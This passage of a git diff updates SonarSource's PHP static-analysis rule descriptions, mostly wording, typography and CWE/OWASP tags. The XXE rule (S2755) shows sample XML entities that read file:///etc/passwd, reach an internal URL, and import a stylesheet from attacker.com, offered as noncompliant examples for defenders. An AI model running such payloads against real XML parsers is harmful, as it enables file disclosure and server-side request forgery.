- Defining case-insensitive constants by calling define() with true as third parameter
- define("myconst", $value) or define("myconst", $value, false)Defining case-insensitive constants by calling define() with true as third parameter
define("myconst", $value) or define("myconst", $value, false)
- FILTER_FLAG_SCHEME_REQUIRED and FILTER_FLAG_HOST_REQUIRED flagsFILTER_VALIDATE_URL flagFILTER_FLAG_SCHEME_REQUIRED and FILTER_FLAG_HOST_REQUIRED flags
FILTER_VALIDATE_URL flag
- fgetss() function, "string.strip_tags" stream filter name, SplFileObject::fgetss() method and
- gzgetss() function
+ fgetss() function, "string.strip_tags" stream filter name, SplFileObject::fgetss() method and
+ gzgetss() function
- mbregex_encoding(), mbereg(), mberegi(), mbereg_replace(),
+ mbregex_encoding(), mbereg(), mberegi(), mbereg_replace(),
mberegi_replace(), mbsplit(), mbereg_match(), mbereg_search(),
mbereg_search_pos(), mbereg_search_regs(), mbereg_search_init(), mbereg_search_getregs(),
- mbereg_search_getpos(), mbereg_search_setpos()
Use the
corresponding mb_ereg_*() variants instead
+ mbereg_search_getpos(), mbereg_search_setpos()
+ Use the
corresponding mb_ereg_*() variants instead
- string search functions with integer needle (stristr, strrchr, strstr, strripos,
- stripos, strrpos, strpos, strchr)
- use a string needle instead
+ string search functions with integer needle (stristr, strrchr, strstr, strripos,
+ stripos, strrpos, strpos, strchr)
use a string needle instead
- image2wbmp()imagewbmp()image2wbmp()
imagewbmp()
- Normalizer::NONE
+ Normalizer::NONE
- Defining an assert() function inside a namespace
- use the standard assert() function
+ Defining an assert() function inside a namespace
use the standard assert() function
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html
index 765f8d3387..4b632fb410 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html
@@ -1,4 +1,4 @@
-Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither
+
Just as pain is your body’s way of telling you something is wrong, errors are PHP’s way of telling you there’s something you need to fix. Neither
pain, nor PHP errors should be ignored.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html
index 25cd9c0d03..612b538b47 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html
@@ -3,7 +3,7 @@
require includes a file but generates a fatal error if an error occurs in the process.
include also includes a file, but generates only a warning if an error occurs.
Predictably, the difference between require and require_once is the same as the difference between include
-and include_once - the "_once" versions ensure that the specified file is only included once.
+and include_once - the "_once" versions ensure that the specified file is only included once.
Because including the same file multiple times could have unpredictable results, the "once" versions are preferred.
Because include_once generates only warnings, it should be used only when the file is being included conditionally, i.e. when all
possible error conditions have been checked beforehand.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json
index 40f9bd911a..a1ba664b92 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2003",
"sqKey": "S2003",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html
index e93dbd5a5e..2ee6f0756c 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html
@@ -7,7 +7,7 @@
It is difficult to properly test classes that use global functions.
Instead of being declared globally, such variables and functions should be moved into a class, potentially marked static, so they can
-be used without a class instance.
+be used without a class instance.
This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json
index 75fec51102..265f4c6508 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json
@@ -1,5 +1,5 @@
{
- "title": "\"&&\" and \"||\" should be used",
+ "title": "\"\u0026\u0026\" and \"||\" should be used",
"type": "CODE_SMELL",
"status": "ready",
"remediation": {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html
index 46c392a158..cf8226c64f 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html
@@ -1,5 +1,5 @@
Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the
-global keyword or though the $GLOBALS array, but these practices considerably reduce the function's readability and
+global keyword or though the $GLOBALS array, but these practices considerably reduce the function’s readability and
reusability. Instead, the global variable should be passed as a parameter to the function.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json
index e5608f0aed..63d794f66e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "15min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-2014",
"sqKey": "S2014",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html
index a2ffb4baa8..2203e4768d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html
@@ -1,7 +1,7 @@
Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on
those files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as
print statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and
-side-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to:
+side-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to:
- generating output
- modifying
ini settings
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html
index d6ed045e15..15412b546c 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html
@@ -1,5 +1,5 @@
Both php_sapi_name() and the PHP_SAPI constant give the same value. But calling the method is less efficient that simply
-referencing the constant.
+referencing the constant.
Noncompliant Code Example
if (php_sapi_name() == 'test') { ... }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html
index 40d13f4ca0..c8c37eba6e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html
@@ -1,79 +1,85 @@
Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should
-really be removed from code.
+really be removed from code.
This rule looks for uses of the following aliases:
-
+
+
+
Alias
Replacement
+
+
- choprtrimchop
rtrim
- closeclosedirclose
closedir
- doublevalfloatvaldoubleval
floatval
- fputsfwritefputs
fwrite
- ini_alterini_setini_alter
ini_set
- is_doubleis_floatis_double
is_float
- is_integeris_intis_integer
is_int
- is_longis_intis_long
is_int
- is_realis_floatis_real
is_float
- is_writeableis_writableis_writeable
is_writable
- joinimplodejoin
implode
- key_existsarray_key_existskey_exists
array_key_exists
- magic_quotes_runtimeset_magic_quotes_runtimemagic_quotes_runtime
set_magic_quotes_runtime
- poscurrentpos
current
- show_sourcehighlight_fileshow_source
highlight_file
- sizeofcountsizeof
count
- strchrstrstrstrchr
strstr
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html
index 703c217618..e16bb3963e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html
@@ -5,10 +5,10 @@
CVE-2019-13466
CVE-2018-15389
-Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.
+Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.
This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection
strings, and for variable names that match any of the patterns from the provided list.
-It's recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", ...
+It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …
Ask Yourself Whether
- Credentials allows access to a sensitive component like a database, a file storage, an API or a service.
@@ -20,7 +20,7 @@ Recommended Secure Coding Practices
- Store the credentials in a configuration file that is not pushed to the code repository.
- Store the credentials in a database.
- - Use your cloud provider's service for managing secrets.
+ - Use your cloud provider’s service for managing secrets.
- If the a password has been disclosed through the source code: change it.
Sensitive Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json
index 69fa200363..8cafe23de8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "30min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2070",
"sqKey": "S2070",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html
index 7d68413343..172c0ec0c7 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html
@@ -1,5 +1,5 @@
Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the
-query. However, this rule doesn't detect SQL injections (unlike rule s3649), the goal is only to highlight complex/formatted queries.
+query. However, this rule doesn’t detect SQL injections (unlike rule {rule:php:S3649}), the goal is only to highlight complex/formatted queries.
Ask Yourself Whether
- Some parts of the query come from untrusted values (like user inputs).
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html
index 52faf70fe2..27d0135891 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html
@@ -1,10 +1,10 @@
When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP
-request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.
+request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.
Ask Yourself Whether
- the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
- - it's not sure that the website contains mixed content or not (ie
- HTTPS everywhere or not)
+ - it’s not sure that the website contains mixed content or not
+ (ie HTTPS everywhere or not)
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html
index 30bb5afbb3..315f2f26fb 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html
@@ -1,4 +1,4 @@
-There's no point in having a PHPUnit test case without any test methods. Similarly, you shouldn't have a file in the tests directory which extends
+
There’s no point in having a PHPUnit test case without any test methods. Similarly, you shouldn’t have a file in the tests directory which extends
PHPUnit\Framework\TestCase but no tests in the file. Doing either of these things may lead someone to think that uncovered classes have been tested.
Add some test method or make the class abstract if it is used by a real test case class.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html
index 39037edcff..ae72378222 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html
@@ -1,5 +1,5 @@
-When the call to a function doesn't have any side effect, what is the point of making the call if the results are ignored? In such cases, either
-the function call is useless and should be dropped, or the source code doesn't behave as expected.
+When the call to a function doesn’t have any side effect, what is the point of making the call if the results are ignored? In such cases, either
+the function call is useless and should be dropped, or the source code doesn’t behave as expected.
Noncompliant Code Example
strlen($name); // Noncompliant; "strlen" has no side effect
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json
index 5e3747f501..fb81f78172 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "10min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2201",
"sqKey": "S2201",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json
index 5542565b70..47f3ae7d1e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2234",
"sqKey": "S2234",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html
index c704a01368..0b53c3a0de 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html
@@ -38,10 +38,15 @@ See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+ - Mobile AppSec
+ Verification Standard - Cryptography Requirements
+ - OWASP Mobile Top 10 2016 Category M5 -
+ Insufficient Cryptography
- MITRE, CWE-338 - Use of Cryptographically Weak Pseudo-Random Number Generator
(PRNG)
- MITRE, CWE-330 - Use of Insufficiently Random Values
- MITRE, CWE-326 - Inadequate Encryption Strength
+ - MITRE, CWE-1241 - Use of Predictable Algorithm in Random Number Generator
- CERT, MSC02-J. - Generate strong random numbers
- CERT, MSC30-C. - Do not use the rand() function for generating pseudorandom numbers
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json
index 5cf08803a8..6c6e8e79f4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json
@@ -8,7 +8,8 @@
},
"tags": [
"cwe",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
],
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2245",
@@ -18,7 +19,8 @@
"CWE": [
338,
330,
- 326
+ 326,
+ 1241
],
"OWASP": [
"A3"
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html
index 62fbda1b8b..3969eb807b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html
@@ -1,5 +1,5 @@
A for loop with a counter that moves in the wrong direction is not an infinite loop. Because of wraparound, the loop will eventually
-reach its stop condition, but in doing so, it will run many, many more times than anticipated, potentially causing unexpected behavior.
+reach its stop condition, but in doing so, it will run many, many more times than anticipated, potentially causing unexpected behavior.
Noncompliant Code Example
for ($i = 0; $i < $length; $i--) { // Noncompliant
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json
index be38cf9ba2..914149fc74 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2251",
"sqKey": "S2251",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html
index 6e9d1a0c81..b95f521d52 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html
@@ -16,7 +16,7 @@ Recommended Secure Coding Practices
than the user session.
Do not try to encode sensitive information in a non human-readable format before writing them in a cookie. The encoding can be reverted and the
original information will be exposed.
-Using cookies only for session IDs doesn't make them secure. Follow Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.
As a side note, every information read from a cookie should be Sanitized.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json
index 6e1d92f119..c243cd1ce4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2255",
"sqKey": "S2255",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html
index 595a1870be..6794145264 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html
@@ -1,5 +1,5 @@
In Unix, "others" class refers to all users except the owner of the file and the members of the group assigned to this file.
-Granting permissions to this group can lead to unintended access to files.
+Granting permissions to this group can lead to unintended access to files.
Ask Yourself Whether
- The application is designed to be run on a multi-user environment.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html
index 514b7e5bf9..64f6b515e5 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2699.html
@@ -1,6 +1,6 @@
A test case without assertions ensures only that no exceptions are thrown. Beyond basic runnability, it ensures nothing about the behavior of the
code under test.
-This rule raised an issue when no assertions are found within a PHPUnit test method.
+This rule raised an issue when no assertions are found within a PHPUnit test method.
Noncompliant Code Example
public function testDoSomething() { // Compliant
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html
index e286f4ba60..0ae6aafa3b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2737.html
@@ -1,5 +1,5 @@
A catch clause that only rethrows the caught exception has the same effect as omitting the catch altogether and letting
-it bubble up automatically, but with more code and the additional detriment of leaving maintainers scratching their heads.
+it bubble up automatically, but with more code and the additional detriment of leaving maintainers scratching their heads.
Such clauses should either be eliminated or populated with the appropriate logic.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html
index ebe2887b14..679163d209 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2755.html
@@ -1,33 +1,32 @@
-XML specification allows the use of entities that can be internal or external (file system /
-network access ...) which could lead to vulnerabilities such as confidential file disclosures or SSRFs.
-Example in this XML document, an external entity read the /etc/passwd file:
+XML standard allows the use of entities, declared in the DOCTYPE of the document, which can be internal or external.
+When parsing the XML file, the content of the external entities is retrieved from an external storage such as the file system or network, which may
+lead, if no restrictions are put in place, to arbitrary file disclosures or server-side request forgery (SSRF) vulnerabilities.
<?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE test [
- <!ENTITY xxe SYSTEM "file:///etc/passwd">
- ]>
-<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
- <to>&xxe;</to>
- <from>Jani</from>
- <heading>Reminder</heading>
- <body>Don't forget me this weekend!</body>
-</note>
-
-In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:
-
-<?xml version="1.0" encoding="UTF-8"?>
-<xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl">
- <xsl:import href="http://www.attacker.com/evil.xsl"/>
- <xsl:include href="http://www.attacker.com/evil.xsl"/>
- <xsl:template match="/">
- &content;
- </xsl:template>
-</xsl:stylesheet>
+<!DOCTYPE person [
+ <!ENTITY file SYSTEM "file:///etc/passwd">
+ <!ENTITY ssrf SYSTEM "https://internal.network/sensitive_information">
+]>
+
+<person>
+ <name>&file;</name>
+ <city>&ssrf;</city>
+ <age>18</age>
+</person>
-It is recommended to disable access to external entities and network access in general.
-Noncompliant Code Examples
+It’s recommended to limit resolution of external entities by using one of these solutions:
+
+ - If DOCTYPE is not necessary, completely disable all DOCTYPE declarations.
+ - If external entities are not necessary, completely disable their declarations.
+ - If external entities are necessary then:
+
+ - Use XML processor features, if available, to authorize only required protocols (eg: https).
+ - And use an entity resolver (and optionally an XML Catalog) to resolve only trusted entities.
+
+
+Noncompliant Code Example
SimpleXML object:
$xml = file_get_contents("xxe.xml");
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json
index 844f6717a4..0c755d53fb 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2757.json
@@ -1,14 +1,12 @@
{
- "title": "\"=+\" should not be used instead of \"+=\"",
+ "title": "\"\u003d+\" should not be used instead of \"+\u003d\"",
"type": "BUG",
"status": "ready",
"remediation": {
"func": "Constant\/Issue",
"constantCost": "2min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2757",
"sqKey": "S2757",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json
index 7600569660..db0d969e3b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2761.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2761",
"sqKey": "S2761",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html
index c6c4d10fa7..8ca4a15df5 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2830.html
@@ -1,5 +1,5 @@
Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a
-dependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own
+dependent object (or client) and are made part of the client’s state. The pattern separates the creation of a client’s dependencies from its own
behavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html
index ff5477fb5f..45c683cb11 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2918.html
@@ -1,6 +1,6 @@
-ini_set changes the value of the given configuration option for the duration of the script's execution. While there may be a reason to
-do this, you should make sure that it's a very good reason indeed, because this is the sort of "magic" change which can cause severe teeth-gnashing
-and hair tearing when the script needs to be debugged.
+ini_set changes the value of the given configuration option for the duration of the script’s execution. While there may be a reason to
+do this, you should make sure that it’s a very good reason indeed, because this is the sort of "magic" change which can cause severe teeth-gnashing
+and hair tearing when the script needs to be debugged.
For instance, if the user explicitly turns logging on for a script, but then the script itself uses ini_set('display_errors', 0); to
turn logging back off, it is likely that every other aspect of the environment will be examined before, in desperation, the script is read to figure
out where the logging is going.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json
index 775282f3d9..ffa13ddb6b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2964.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "15min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2964",
"sqKey": "S2964",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json
index 9da744340e..f7449cb9f2 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3011.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "30min"
},
- "tags": [
-
- ],
+ "tags": [],
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-3011",
"sqKey": "S3011",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html
index 78194b467d..60b3514a46 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3330.html
@@ -1,7 +1,7 @@
When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will
-be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it's up to the developer
+be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer
to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target
-the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won't be possible to exploit the XSS
+the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS
vulnerability to steal session-cookies.
Ask Yourself Whether
@@ -12,7 +12,7 @@ Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
- - By default the
HttpOnly flag should be set to true for most of the cookies and it's mandatory for session /
+ - By default the
HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session /
sensitive-security cookies.
Sensitive Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html
index 44682270d8..9c7a657acf 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.html
@@ -1,7 +1,7 @@
-A cookie's domain specifies which websites should be able to read it. Left blank, browsers are supposed to only send the cookie to sites that
+
A cookie’s domain specifies which websites should be able to read it. Left blank, browsers are supposed to only send the cookie to sites that
exactly match the sending domain. For example, if a cookie was set by lovely.dream.com, it should only be readable by that domain, and not by
nightmare.com or even strange.dream.com. If you want to allow sub-domain access for a cookie, you can specify it by adding a dot in
-front of the cookie's domain, like so: .dream.com. But cookie domains should always use at least two levels.
+front of the cookie’s domain, like so: .dream.com. But cookie domains should always use at least two levels.
Cookie domains can be set either programmatically or via configuration. This rule raises an issue when any cookie domain is set with a single
level, as in .com.
Ask Yourself Whether
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json
index 609ab8c059..5bdbeddee8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S3331.json
@@ -6,9 +6,7 @@
"func": "Constant\/Issue",
"constantCost": "5min"
},
- "tags": [
